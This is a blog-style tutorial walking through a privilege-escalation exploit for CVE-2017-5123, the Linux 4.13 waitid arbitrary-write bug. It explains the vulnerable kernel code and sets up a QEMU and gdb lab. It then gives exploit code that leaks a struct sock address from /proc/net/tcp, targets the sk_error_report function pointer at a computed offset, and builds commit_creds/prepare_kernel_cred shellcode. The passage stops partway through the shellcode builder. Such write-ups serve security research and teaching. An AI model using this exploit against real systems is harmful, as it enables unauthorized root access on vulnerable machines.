CVE-2017-5123 exploitation

02/11/2017 in exploit | tags : kernel, exploit, CVE by Phenol

Intro

On 12 October 2017, a new vulnerability in Linux kernel 4.13 was discovered by Chris Salls. The bug was introduced in the waitid syscall when it was refactored. It lets a userspace program write anywhere in writable kernel memory, which makes a privilege escalation exploit possible. When a friend told me about it, I checked and saw that I was vulnerable: my kernel was a 4.13.6 on Arch Linux, and a lot of my friends were exposed too. Some people from another French CTF team released an exploit, but it was not useful to me because it required disabling a very common protection (mmap_min_addr). Federico Bento also wrote an exploit which disables SELinux. To train myself, and because it's fun, I decided to write my own exploit, my first real kernel exploit. So please take a seat, grab your favourite coffee mug and enjoy!

If you don't want to bother with my gibberish explanation, you can find the exploit code directly on my GitHub.

Warning: bad english inside.

UPDATE 07/11/2017: Chris Salls, who discovered the vulnerability, has written a really great article about it. He also shows how to exploit it to bypass protections like SMEP/SMAP and escape from the Chrome sandbox. Read it! It's very cool and it's here.

I) The vulnerability

This vuln was assigned CVE-2017-5123. The bug was introduced on 2017-05-21 and fixed on 2017-10-09. It is present in the 4.13.6 kernel and possibly in 4.14.0-rc4++. As I said earlier, the bug is in the waitid syscall, whose prototype is declared in sys/wait.h:

int waitid(idtype_t idtype, id_t id, siginfo_t *infop, int options);

This syscall waits for a child process to change state. Its first argument is an idtype_t which says whether it should wait for just one PID, a PGID or all children of the current process. The second argument is the PID or PGID to wait for. The third argument is the most interesting: it is the address of a siginfo_t structure. The last argument selects which state changes waitid should wait for.

Let's take a look at the vulnerable implementation of the waitid syscall in the kernel, in kernel/exit.c:

SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
        infop, int, options, struct rusage __user *, ru)
{
    struct rusage r;
    struct waitid_info info = {.status = 0};
    long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
    int signo = 0;

    if (err > 0) {
        signo = SIGCHLD;
        err = 0;
        if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
            return -EFAULT;
    }
    if (!infop)
        return err;
    user_access_begin();
    unsafe_put_user(signo, &infop->si_signo, Efault);
    unsafe_put_user(0, &infop->si_errno, Efault);
    unsafe_put_user((short)info.cause, &infop->si_code, Efault);
    unsafe_put_user(info.pid, &infop->si_pid, Efault);
    unsafe_put_user(info.uid, &infop->si_uid, Efault);
    unsafe_put_user(info.status, &infop->si_status, Efault);
    user_access_end();
    return err;
Efault:
    user_access_end();
    return -EFAULT;
}

The vulnerability comes from the fact that the kernel doesn't check that infop really points to userspace: the access_ok() check went missing in the refactoring, and unsafe_put_user() does no checking of its own. So if we supply a kernel address as the third argument (the siginfo_t pointer), the data normally written to a structure in userspace is written to kernelspace instead, allowing us to write anywhere in writable kernel memory. Unfortunately we can't write exactly what we want.
Reading the code above, we see that it writes: si_signo (the signal number), si_errno (always 0), si_code (the signal code), si_pid (the PID of the child process), si_uid (the UID of the user owning the process) and si_status, aka the exit status.
Of all these values the easiest to control is the exit status: by calling exit() we can choose an exit status from 0 to 0xff, so of the four bytes of the int we only control the least significant one... We can't write 8 fully controlled contiguous bytes, even with consecutive writes, without overwriting what was written before. Before going further on how to exploit this, let's create a debug environment.

II) Making a debug env

We will set up a debug environment with QEMU and gdb. First we need to build a mini Linux made of our vulnerable kernel and a tiny initramfs. To test our exploit quickly we will also set up a 9p (9PNET) share so that we can easily pass files from the host to the vulnerable VM.
First we create a working directory and download a vanilla 4.13.6 kernel from kernel.org:

[phenol@Lab cve]$ mkdir cve-2017-5123
[phenol@Lab cve]$ cd cve-2017-5123/
[phenol@Lab cve-2017-5123]$ wget https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-4.13.6.tar.xz
--2017-11-02 20:13:42--  https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-4.13.6.tar.xz
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving cdn.kernel.org... 151.101.61.176, 2a04:4e42:f::432
Connecting to cdn.kernel.org|151.101.61.176|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 100586296 (96M) [application/x-xz]
Saving to: ‘linux-4.13.6.tar.xz’

linux-4.13.6.tar.xz                     100%[=============================================================================>]  95.93M  1.41MB/s    in 71s     

2017-11-02 20:14:53 (1.36 MB/s) - ‘linux-4.13.6.tar.xz’ saved [100586296/100586296]

[phenol@Lab cve-2017-5123]$ tar xf linux-4.13.6.tar.xz 
[phenol@Lab cve-2017-5123]$ cd linux-4.13.6
[phenol@Lab linux-4.13.6]$ 

We need to configure and compile our kernel. We start from the default configuration, then improve it by adding debug symbols and all the modules needed for the 9p share.

[phenol@Lab linux-4.13.6]$ make defconfig
  HOSTCC  scripts/basic/fixdep
  HOSTCC  scripts/kconfig/conf.o
  SHIPPED scripts/kconfig/zconf.tab.c
  SHIPPED scripts/kconfig/zconf.lex.c
  SHIPPED scripts/kconfig/zconf.hash.c
  HOSTCC  scripts/kconfig/zconf.tab.o
  HOSTLD  scripts/kconfig/conf
*** Default configuration is based on 'x86_64_defconfig'
#
# configuration written to .config
#
[phenol@Lab linux-4.13.6]$ make menuconfig

If everything is configured correctly, the following options should be set in our .config file:

# for the 9pnet share we need 9p and virtio:

CONFIG_NET_9P=y
CONFIG_NET_9P_VIRTIO=m
CONFIG_NET_9P_DEBUG=y
CONFIG_9P_FS=y
CONFIG_9P_FS_POSIX_ACL=y
CONFIG_9P_FS_SECURITY=y
CONFIG_BLK_MQ_VIRTIO=y
CONFIG_VIRTIO_NET=m
CONFIG_VIRTIO=m
CONFIG_VIRTIO_PCI=m
CONFIG_VIRTIO_PCI_LEGACY=y
CONFIG_VIRTIO_MMIO=m
CONFIG_CRYPTO_DEV_VIRTIO=m

# for debug:
CONFIG_DEBUG_INFO=y
# We can also add:
CONFIG_GDB_SCRIPTS=y # to use the gdb scripts that ship with the kernel

Now we can compile the kernel. The modules will be compiled and installed later, once the initramfs is ready.

[phenol@Lab linux-4.13.6]$ make -j4 bzImage
    ...

Afterwards, our fresh kernel is in arch/x86/boot/bzImage.
To create the initramfs quickly and easily, we will use busybox. First we download busybox, extract it, generate a default config and compile it statically to avoid library dependency trouble:

[phenol@Lab linux-4.13.6]$ cd ..
[phenol@Lab cve-2017-5123]$ wget https://busybox.net/downloads/busybox-1.27.2.tar.bz2
--2017-11-02 20:45:39--  https://busybox.net/downloads/busybox-1.27.2.tar.bz2
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving busybox.net... 140.211.167.122
Connecting to busybox.net|140.211.167.122|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2216527 (2.1M) [application/x-bzip2]
Saving to: ‘busybox-1.27.2.tar.bz2’

busybox-1.27.2.tar.bz2                  100%[=============================================================================>]   2.11M   625KB/s    in 3.5s    

2017-11-02 20:45:44 (625 KB/s) - ‘busybox-1.27.2.tar.bz2’ saved [2216527/2216527]

[phenol@Lab cve-2017-5123]$ tar xf busybox-1.27.2.tar.bz2 
[phenol@Lab cve-2017-5123]$ cd busybox-1.27.2
[phenol@Lab busybox-1.27.2]$ make defconfig
    ....
[phenol@Lab busybox-1.27.2]$ make -j4 CFLAGS=-static install

Now we can find our initramfs root in the _install directory:

[phenol@Lab busybox-1.27.2]$ ls -l _install/
total 12
drwxr-xr-x 2 phenol phenol 4096 Nov  2 20:49 bin
lrwxrwxrwx 1 phenol phenol   11 Nov  2 20:49 linuxrc -> bin/busybox
drwxr-xr-x 2 phenol phenol 4096 Nov  2 20:49 sbin
drwxr-xr-x 4 phenol phenol 4096 Nov  2 20:49 usr

We have to create some other directories such as etc, home, root, dev, proc and sys, then we move the initramfs to a directory at the root of our working dir.

[phenol@Lab busybox-1.27.2]$ cd _install/
[phenol@Lab _install]$ ls
bin  linuxrc  sbin  usr
[phenol@Lab _install]$ mkdir etc proc dev home root home/phenol
[phenol@Lab _install]$ cd ..
[phenol@Lab busybox-1.27.2]$ mv _install ../initramfs_root

Next we create two users, root and a regular user called phenol:

[phenol@Lab initramfs_root]$ vim etc/passwd
[phenol@Lab initramfs_root]$ cat etc/passwd 
root:x:0:0:root:/root:/bin/sh
phenol:x:1000:1000:user:/home/phenol:/bin/sh
[phenol@Lab initramfs_root]$ 

We also need an init script, to mount the required filesystems, load the required modules and start a session. The kernel runs the init script once it has booted.

[phenol@Lab initramfs_root]$ cat init 
#!/bin/sh


#Badass ascii-art 'coz we're fucking h4x0rz
echo "ICAgICAgICAgICAgICAgICAgICAgX18gICAgICAgICAgICAgICAgICAgICAgICAKX19fX19fX18gIF8gIF9fX19fXyB8ICB8IF9fIF9fX19fX19fX19fICBfX19fICAKXF9fX18gXCBcLyBcLyAvICAgIFx8ICB8LyAvLyBfXyBcXyAgX18gXC8gICAgXCAKfCAgfF8+ID4gICAgIC8gICB8ICBcICAgIDxcICBfX18vfCAgfCBcLyAgIHwgIFwKfCAgIF9fLyBcL1xfL3xfX198ICAvX198XyBcXF9fXyAgPl9ffCAgfF9fX3wgIC8KfF9ffCAgICAgICAgICAgICAgXC8gICAgIFwvICAgIFwvICAgICAgICAgICBcLyAKCSMJRGVidWcgQW5kIHAwd24JCSMKCQkgICAgUGhlbm9sCgoK" | base64 -d

mount -t devtmpfs none /dev
mount -t proc proc /proc
mount -t sysfs sysfs /sys

# The order of module loading is important. you can check the module.dep file (@thx francois!)
modprobe virtio
modprobe virtio_ring
modprobe virtio_pci
modprobe virtio_net
modprobe 9pnet_virtio

# share dir
mkdir -p /share
mount -t 9p -o trans=virtio shared /share

setsid cttyhack setuidgid 1000 sh

umount /proc
umount /sys

poweroff -f

We go back to our kernel directory, then compile the modules and install them into the initramfs by specifying INSTALL_MOD_PATH:

[phenol@Lab initramfs_root]$ cd ../linux-4.13.6
[phenol@Lab linux-4.13.6]$ make modules && make modules_install INSTALL_MOD_PATH=/home/phenol/cve/cve-2017-5123/initramfs_root/
  CHK     include/config/kernel.release
  CHK     include/generated/uapi/linux/version.h
  CHK     include/generated/utsrelease.h
  CHK     include/generated/bounds.h
  CHK     include/generated/timeconst.h
  CHK     include/generated/asm-offsets.h
  CALL    scripts/checksyscalls.sh
  CHK     scripts/mod/devicetable-offsets.h
  CC [M]  fs/efivarfs/inode.o
  CC [M]  fs/efivarfs/file.o
  CC [M]  fs/efivarfs/super.o
  LD [M]  fs/efivarfs/efivarfs.o
  CC [M]  crypto/crypto_engine.o
  CC [M]  drivers/crypto/virtio/virtio_crypto_algs.o
  CC [M]  drivers/crypto/virtio/virtio_crypto_mgr.o
  CC [M]  drivers/crypto/virtio/virtio_crypto_core.o
    ....
[phenol@Lab linux-4.13.6]$ cd ../initramfs_root/ && ls lib/
modules
[phenol@Lab initramfs_root]$ ls
bin  dev  etc  home  init  lib  linuxrc  proc  root  sbin  usr
[phenol@Lab initramfs_root]$ ls lib/modules/4.13.6/
build  kernel  modules.builtin  modules.order  source
[phenol@Lab initramfs_root]$ ls lib/modules/4.13.6/build
COPYING  Documentation  Kconfig      Makefile        README  block  crypto   firmware  include  ipc lib  modules.builtin  net      scripts   sound  usr
CREDITS  Kbuild     MAINTAINERS  Module.symvers  arch    certs  drivers  fs        init kernel  mm   modules.order    samples  security  tools  virt
[phenol@Lab initramfs_root]$ 

Let's compress the initramfs and launch qemu.

[phenol@Lab initramfs_root]$ find . |cpio -H newc -o | gzip > ../initramfs.img
10592 blocks
[phenol@Lab initramfs_root]$ cd ..
[phenol@Lab cve-2017-5123]$ mv linux-4.13.6/arch/x86/boot/bzImage .

To launch qemu we will use the following script:

[phenol@Lab cve-2017-5123]$ cat startvm.sh 
#!/bin/bash

if [ -z "$1" ]
then
    SHAREHOST=/tmp
else
    SHAREHOST=$1
fi

qemu-system-x86_64 \
    -s \
    -m 512M \
    -nographic \
    -kernel bzImage \
    -enable-kvm \
    -append 'console=ttyS0 loglevel=3 oops=panic panic=1' \
    -monitor /dev/null \
    -initrd initramfs.img \
    -fsdev local,id=root,path="$SHAREHOST",security_model=none \
    -device virtio-9p-pci,fsdev=root,mount_tag=shared

And ... TADAAAAAM:

[phenol@Lab cve-2017-5123]$ ./startvm.sh 
                     __                        
________  _  ______ |  | __ ___________  ____  
\____ \ \/ \/ /    \|  |/ // __ \_  __ \/    \ 
|  |_> >     /   |  \    <\  ___/|  | \/   |  \
|   __/ \/\_/|___|  /__|_ \\___  >__|  |___|  /
|__|              \/     \/    \/           \/ 
    #   Debug And p0wn      #
            Phenol


/ $ id
uid=1000(phenol) gid=1000 groups=1000 

Yeah, I know, that's a fucking ugly ascii art! The fun begins here: because we passed the -s flag to QEMU, we can attach to the kernel with gdb:

[phenol@Lab linux-4.13.6]$ gdb vmlinux
GNU gdb (GDB) 8.0.1
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-pc-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from vmlinux...done.
gdb-peda$ target remote :1234
Remote debugging using :1234
Warning: not running or target is remote
0xffffffffb0557d48 in ?? ()

III) The exploitation

Generally, when we have an arbitrary write vuln, the exploit follows these steps:

  • Find the address of a function pointer

  • Overwrite this function pointer with the address of a shellcode or a ROP gadget

  • Trigger the function pointer

As we said in part I), we don't have much control over the values that are written. We can't just overwrite a function pointer with another well-formed address such as that of a ROP gadget.
But we know the UID and the PID of our child process, and sizeof(uid_t) + sizeof(pid_t) = 8 bytes, aka the size of an address on x86_64. By combining the uid and pid values we can build an address that is mappable in userspace. E.g. if the uid of the user is 1000 (0x3e8) and the pid is 993 (0x3e1), we can overwrite a function pointer with the address 0x3e8000003e1, and we can also map memory there from userspace. The plan is to find a function pointer, create a memory mapping at our 'fake-uid-pid-address' and then memcpy there a shellcode which elevates privileges by calling commit_creds(prepare_kernel_cred(0)) when the function pointer is triggered.
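The arithmetic behind that example address can be sketched in a few lines. The function name fake_address is mine; it only assumes a little-endian machine, where the field at the lower address (si_pid) ends up in the low 32 bits of the 8-byte value and si_uid in the high 32 bits.

```c
#include <stdint.h>
#include <sys/types.h>

/* Value read back as a 64-bit pointer when si_pid and si_uid are written
 * next to each other on a little-endian machine. */
uint64_t fake_address(uid_t uid, pid_t pid)
{
    return ((uint64_t)uid << 32) | (uint32_t)pid;
}
```

With uid 1000 and pid 993, fake_address returns 0x3e8000003e1, the address used in the example above.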

We need to find a function pointer and, more importantly, one that lives in writable memory. Lots of function pointers in the kernel are declared const (or sit in const structures), so they are located in the .rodata segment, which isn't writable. Lots of others, like the LSM (Linux Security Module) hooks, are initialised at boot and marked __ro_after_init, so the pages holding them are made read-only once init is done :(

By playing with the /proc directory we can find some interesting addresses. /proc/net/tcp, for example, lists all the TCP sockets on the system, and if the kptr_restrict protection isn't set (I will explain it later in part IV) it shows the kernelspace addresses of their struct sock:

[phenol@Lab cve-2017-5123]$ cat /proc/net/tcp
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode                                                     
   0: 00000000:04D2 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 15889787 1 ffff9f1102bc6800 99 0 0 10 0                   
   1: 4701A8C0:DCAC 21BD53D4:0539 01 00000000:00000000 02:00011862 00000000  1000        0 15177636 2 ffff9f11188e9000 23 3 30 10 -1                 
   2: 4701A8C0:E6DA 8E16D9AC:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 15941196 1 ffff9f1118d2a000 25 3 27 10 -1                 
   3: 4701A8C0:C7F6 EAD03AD8:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 15940232 1 ffff9f1036d88800 23 3 30 10 -1                 
   4: 4701A8C0:BF8A A2EC38B0:0016 01 00000000:00000000 02:0009182A 00000000  1000        0 4322245 2 ffff9f1036d8e800 29 3 30 4 4                    
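Whether those addresses show up depends on the kptr_restrict sysctl. As a minimal sketch, its value can be read from C like this; the helper name read_int_file is mine, and the only path assumed is the standard /proc/sys/kernel/kptr_restrict.

```c
#include <stdio.h>

/* Read a single integer from a sysctl-style file.
 * Returns 0 on success, -1 if the file can't be opened or parsed. */
int read_int_file(const char *path, int *value)
{
    FILE *f = fopen(path, "r");
    int ok;

    if (f == NULL)
        return -1;
    ok = (fscanf(f, "%d", value) == 1);
    fclose(f);
    return ok ? 0 : -1;
}
```

Calling read_int_file("/proc/sys/kernel/kptr_restrict", &v) and getting v == 0 means the addresses are printed as they are on this kernel; with 1 or 2 an unprivileged reader should only see zeros.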

The sock structure is declared as follows in the kernel source, in include/net/sock.h:

struct sock {
    /*
     * Now struct inet_timewait_sock also uses sock_common, so please just
     * don't add nothing before this first member (__sk_common) --acme
     */
    struct sock_common  __sk_common;
#define sk_node         __sk_common.skc_node
#define sk_nulls_node       __sk_common.skc_nulls_node
#define sk_refcnt       __sk_common.skc_refcnt
#define sk_tx_queue_mapping __sk_common.skc_tx_queue_mapping

#define sk_dontcopy_begin   __sk_common.skc_dontcopy_begin
#define sk_dontcopy_end     __sk_common.skc_dontcopy_end
#define sk_hash         __sk_common.skc_hash
#define sk_portpair     __sk_common.skc_portpair
#define sk_num          __sk_common.skc_num
#define sk_dport        __sk_common.skc_dport
#define sk_addrpair     __sk_common.skc_addrpair
#define sk_daddr        __sk_common.skc_daddr
#define sk_rcv_saddr        __sk_common.skc_rcv_saddr
#define sk_family       __sk_common.skc_family
#define sk_state        __sk_common.skc_state
#define sk_reuse        __sk_common.skc_reuse
#define sk_reuseport        __sk_common.skc_reuseport
#define sk_ipv6only     __sk_common.skc_ipv6only
#define sk_net_refcnt       __sk_common.skc_net_refcnt
#define sk_bound_dev_if     __sk_common.skc_bound_dev_if
#define sk_bind_node        __sk_common.skc_bind_node
#define sk_prot         __sk_common.skc_prot
#define sk_net          __sk_common.skc_net
#define sk_v6_daddr     __sk_common.skc_v6_daddr
#define sk_v6_rcv_saddr __sk_common.skc_v6_rcv_saddr
#define sk_cookie       __sk_common.skc_cookie
#define sk_incoming_cpu     __sk_common.skc_incoming_cpu
#define sk_flags        __sk_common.skc_flags
#define sk_rxhash       __sk_common.skc_rxhash

    socket_lock_t       sk_lock;
    atomic_t        sk_drops;
    int         sk_rcvlowat;

    ...

/* STRIPPED LOT OF LINE TO IMPROVE READABILITY */
    ...

    u32         sk_max_ack_backlog;
#endif
    struct sock_cgroup_data sk_cgrp_data;
    struct mem_cgroup   *sk_memcg;
    void            (*sk_state_change)(struct sock *sk); // FUNCTION PTR
    void            (*sk_data_ready)(struct sock *sk); // FUNCTION PTR
    void            (*sk_write_space)(struct sock *sk); // FUNCTION PTR
    void            (*sk_error_report)(struct sock *sk); // FUNCTION PTR AGAIN!
    int         (*sk_backlog_rcv)(struct sock *sk,
                          struct sk_buff *skb); //YOLOOOOO
    void                    (*sk_destruct)(struct sock *sk); //COOL NO?

    struct sock_reuseport __rcu *sk_reuseport_cb;
    struct rcu_head     sk_rcu;
};

We can see that the sock structure holds 6 function pointers! And we can get their addresses by reading /proc/net/tcp and adding an offset. So now the plan is to create a listening TCP socket, leak the address of its sock struct in the kernel, and overwrite one of the six callbacks with our userspace-mapped address!

We init a listening socket on a hardcoded port, here 8888:

int create_listening_tcp(void)
{
    int                 socket_desc;
    struct sockaddr_in  server;

    socket_desc = socket(AF_INET, SOCK_STREAM, 0);
    if (socket_desc == -1)
        exw(EXIT_FAILURE, "[!] Can't create socket");
    /* zero the struct so sin_zero does not hold stack garbage */
    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = INADDR_ANY;
    server.sin_port = htons(8888);
    if (bind(socket_desc, (struct sockaddr *)&server, sizeof(server)) < 0)
        exw(EXIT_FAILURE, "[!] Can't bind socket");
    if (listen(socket_desc, 3) < 0)
        exw(EXIT_FAILURE, "[!] Can't listen on socket");
    printf("[+] Listening TCP sock on port 8888\n");
    return (socket_desc);
}

Then, from the socket file descriptor returned, we get its inode with the fstat syscall (in order to retrieve the corresponding sock struct address):

        sockfd = create_listening_tcp();
        fstat(sockfd, &statbuf);
        target_ptr = leak_sock_struct(statbuf.st_ino) + SOCKETSTRUCT_OFFSET;

with leak_sock_struct defined as follows:

unsigned long   leak_sock_struct(int sock_inode)
{
    FILE            *f;
    unsigned long   addr;
    int             inode;
    char            s0[256];

    if ((f = fopen("/proc/net/tcp", "r")) == NULL)
        exw(EXIT_FAILURE, "[-] Failed to open /proc/net/tcp");
    /* skip the column headers; the padding that follows is whitespace,
     * which fscanf ignores */
    fseek(f, 97, SEEK_SET);
    /* field 10 is the inode, field 12 the struct sock address */
    while (fscanf(f, "%s %s %s %s %s %s %s %s %s %d %s %p %s %s %s %s %s\n",
        s0, s0, s0, s0, s0, s0, s0, s0, s0, &inode, s0, (void**)&addr,
        s0, s0, s0, s0, s0) != EOF)
    {
        if (sock_inode == inode)
        {
            fclose(f);
            printf("[+] Found sock struct at %#lx\n", addr);
            return (addr);
        }
    }
    fclose(f);
    printf("[!] Can't find socket by inode %d\n", sock_inode);
    return (0);
}

The function itself is very simple: it opens /proc/net/tcp, reads it line by line and checks whether the inode it read equals the inode of our socket. If so, it returns the address read on that line.
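The per-line parsing can also be written without the temporary buffer, by letting sscanf skip the columns we don't care about. This is only a sketch of an alternative, not the code used in the exploit, and parse_tcp_line is a name I made up.

```c
#include <stdio.h>

/* Parse one data line of /proc/net/tcp. Returns 1 and fills *inode and
 * *addr on success, 0 if the line does not match (e.g. the header line). */
int parse_tcp_line(const char *line, unsigned long *inode, unsigned long *addr)
{
    /* %*s skips one whitespace-delimited column without storing it:
     * sl, local, remote, st, queues, timer, retrnsmt, uid, timeout,
     * then comes the inode, the refcount and the struct sock pointer. */
    return sscanf(line, "%*s %*s %*s %*s %*s %*s %*s %*s %*s %lu %*s %lx",
                  inode, addr) == 2;
}
```

The header line is rejected on its own, because its tenth column is the word "uid" and not a number, so no fseek is needed when lines are read with fgets and passed to this function.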

The SOCKETSTRUCT_OFFSET macro is the offset of the function pointer within the structure. We can determine it statically, because we know the structure, or we can take the easy way and find it dynamically with a debugger: we just take the leaked sock address and look in gdb for our function pointer.

In our VM we launch a simple program which sets up a listening TCP socket, then we read /proc/net/tcp and retrieve the address of the sock structure:

/ $ /share/a.out &
/ $ [+] Listening TCP sock on port 8888

[1]+  Stopped (tty input)        /share/a.out
/ $ cat /proc/net/tcp
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode                                                     
   0: 00000000:22B8 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 7129 1 ffff88001d0e0000 100 0 0 10 0                      
/ $ 

We launch gdb, attach to the kernel, and examine the memory at address 0xffff88001d0e0000 in order to locate the function pointer callbacks:

[phenol@Lab linux-4.13.6]$ gdb vmlinux
GNU gdb (GDB) 8.0.1
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-pc-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from vmlinux...done.
gdb-peda$ target remote :1234
Remote debugging using :1234
Warning: not running or target is remote
default_idle () at arch/x86/kernel/process.c:342
342     trace_cpu_idle_rcuidle(PWR_EVENT_EXIT, smp_processor_id());
gdb-peda$ x/100xg 0xffff88001d0e0000
0xffff88001d0e0000: 0x0000000000000000  0x22b8000000000000
0xffff88001d0e0010: 0x00000000400a0002  0x0000000000000000
0xffff88001d0e0020: 0xffff88001d11dfb8  0xffffffff81eeb1a0
0xffff88001d0e0030: 0xffffffff81ee4d00  0x0000000000000000
0xffff88001d0e0040: 0x0000000000000000  0x0000000000000000
0xffff88001d0e0050: 0x0000000000000000  0x0000000000000000
0xffff88001d0e0060: 0x0000000001000300  0x0000000000000000
0xffff88001d0e0070: 0xffffffff8212a448  0xffffffffffffffff
0xffff88001d0e0080: 0x0000000000000001  0x0000000000000000
0xffff88001d0e0090: 0x0000000000000000  0xffff88001d0e0098
0xffff88001d0e00a0: 0xffff88001d0e0098  0x0000000100000000
0xffff88001d0e00b0: 0xffff88001d0e00b0  0xffff88001d0e00b0
0xffff88001d0e00c0: 0x0000000000000000  0xffff88001d0e00c8
0xffff88001d0e00d0: 0xffff88001d0e00c8  0x0000000000000000
0xffff88001d0e00e0: 0x0000000000000000  0x0000000000000000
0xffff88001d0e00f0: 0x0000000000000000  0x0000000000000000
0xffff88001d0e0100: 0x0001555400000000  0x0000000000000000
0xffff88001d0e0110: 0xffff88001d11de40  0x0000000000000000
0xffff88001d0e0120: 0x0000000000000000  0x0000000000000000
0xffff88001d0e0130: 0x0000000000000000  0x0000400000000000
0xffff88001d0e0140: 0x0000000100000000  0x0000000000000000
0xffff88001d0e0150: 0x0000000000000000  0xffff88001d0e0158
0xffff88001d0e0160: 0xffff88001d0e0158  0x0000000000000000
0xffff88001d0e0170: 0x00000000ffffffff  0x0000000000000000
0xffff88001d0e0180: 0x7fffffffffffffff  0x0000000000000000
0xffff88001d0e0190: 0x0000000000000000  0x0000000000000000
0xffff88001d0e01a0: 0xffffffff817cf130  0xffff88001d0e0000
0xffff88001d0e01b0: 0x0000000000000000  0x0000000000000000
0xffff88001d0e01c0: 0xffffffffffffffff  0x0000000000000000
0xffff88001d0e01d0: 0x0000000000000000  0x0000000000000000
0xffff88001d0e01e0: 0x0000000000000000  0x0000000000000000
0xffff88001d0e01f0: 0x00000000014000c0  0x0000000000010680
0xffff88001d0e0200: 0x0000000000000000  0xffffffff81eeb1a0
0xffff88001d0e0210: 0x0000000000000000  0x0000000000000000
0xffff88001d0e0220: 0x0000000300000000  0x00000000000003e8
0xffff88001d0e0230: 0x0000000000000000  0x0000000000000000
0xffff88001d0e0240: 0x7fffffffffffffff  0xffffffffc4653600
0xffff88001d0e0250: 0x0000000000000000  0xffff88001dd1b180
0xffff88001d0e0260: 0x0000000000000000  0xffff88001ebcf740
0xffff88001d0e0270: 0x0000000000000000  0xffffffff81740600 //Our functions ptrs start here!
0xffff88001d0e0280: 0xffffffff81741520  0xffffffff8174da90
0xffff88001d0e0290: 0xffffffff81741420  0xffffffff817d2eb0
0xffff88001d0e02a0: 0xffffffff817ea170  0x0000000000000000
0xffff88001d0e02b0: 0x0000000000000000  0x0000000000000000
0xffff88001d0e02c0: 0x0000000000000000  0x0000ffff00000000
0xffff88001d0e02d0: 0x000000000000b822  0x0000000000000000
0xffff88001d0e02e0: 0x0101000000000000  0x0000000000000052
0xffff88001d0e02f0: 0x0000000000000000  0x0000000000000000
0xffff88001d0e0300: 0x0000000000000000  0x0000000000000000
0xffff88001d0e0310: 0x0000000000000000  0x0000000000000000
gdb-peda$ x/i 0xffffffff81740600
   0xffffffff81740600 <sock_def_wakeup>:    mov    rdi,QWORD PTR [rdi+0x110]
gdb-peda$ x/i 0xffffffff81741520
   0xffffffff81741520 <sock_def_readable>:  push   rbp
gdb-peda$ x/i 0xffffffff8174da90
   0xffffffff8174da90 <sk_stream_write_space>:  mov    eax,DWORD PTR [rdi+0x140]
gdb-peda$ x/i 0xffffffff81741420
   0xffffffff81741420 <sock_def_error_report>:  push   rbp
gdb-peda$ x/i 0xffffffff817d2eb0
   0xffffffff817d2eb0 <tcp_v4_do_rcv>:  push   rbp
gdb-peda$ x/i 0xffffffff817ea170
   0xffffffff817ea170 <inet_sock_destruct>: push   rbp

We will target the function pointer of this callback:
void (*sk_error_report)(struct sock *sk);
which points to 0xffffffff81741420. So our offset is 0xffff88001d0e0290 - 0xffff88001d0e0000 = 0x290 = 656, and we can define our macro like this:

#define SOCKETSTRUCT_OFFSET (sizeof(unsigned long) * 82) // 656 / 8 = 82
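The same computation, written out as code for anyone who wants to redo it for another kernel build. Both helper names are mine, and the addresses are simply the ones read from the gdb dump above.

```c
#include <stdint.h>

/* Byte offset of a member, given the address of the structure and the
 * address at which the member was observed in the debugger. */
uint64_t member_offset(uint64_t struct_addr, uint64_t member_addr)
{
    return member_addr - struct_addr;
}

/* Index of that member when the structure is viewed as an array of
 * 8-byte words, which is how x/100xg displays it. */
uint64_t word_index(uint64_t offset)
{
    return offset / sizeof(uint64_t);
}
```

member_offset(0xffff88001d0e0000, 0xffff88001d0e0290) gives 656, and word_index(656) gives 82, the factor used in the macro.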

Now that we know where to write, we just have to compute our userspace address, map memory there and copy the shellcode into it. Let's build the shellcode with rasm2:

[phenol@Lab linux-4.13.6]$ rasm2 -a x86 -b64 "xor rdx, rdx; xor rdi, rdi; xor rsi, rsi; xor rcx, rcx; xor rax, rax; mov rbx, 0x4141414141414141; call rbx; mov rdi, rax;mov rcx, 0x4242424242424242; call rcx;ret"
4831d24831ff4831f64831c94831c048bb4141414141414141ffd34889c748b94242424242424242ffd1c3

The values 0x4141414141414141 and 0x4242424242424242 are overwritten at runtime with the addresses of prepare_kernel_cred and commit_creds, leaked from /proc/kallsyms. Look at the build_shellcode function, which patches the shellcode and writes it to our freshly mapped zone.

void    build_shellcode(unsigned long mem)
{
    char        shellcode[] = "\x48\x31\xd2\x48\x31\xff\x48\x31\xf6\x48\x31\xc9"
                      "\x48\x31\xc0\x48\xbb\x41\x41\x41\x41\x41\x41\x41"
                      "\x41\xff\xd3\x48\x89\xc7\x48\xb9\x42\x42\x42\x42"
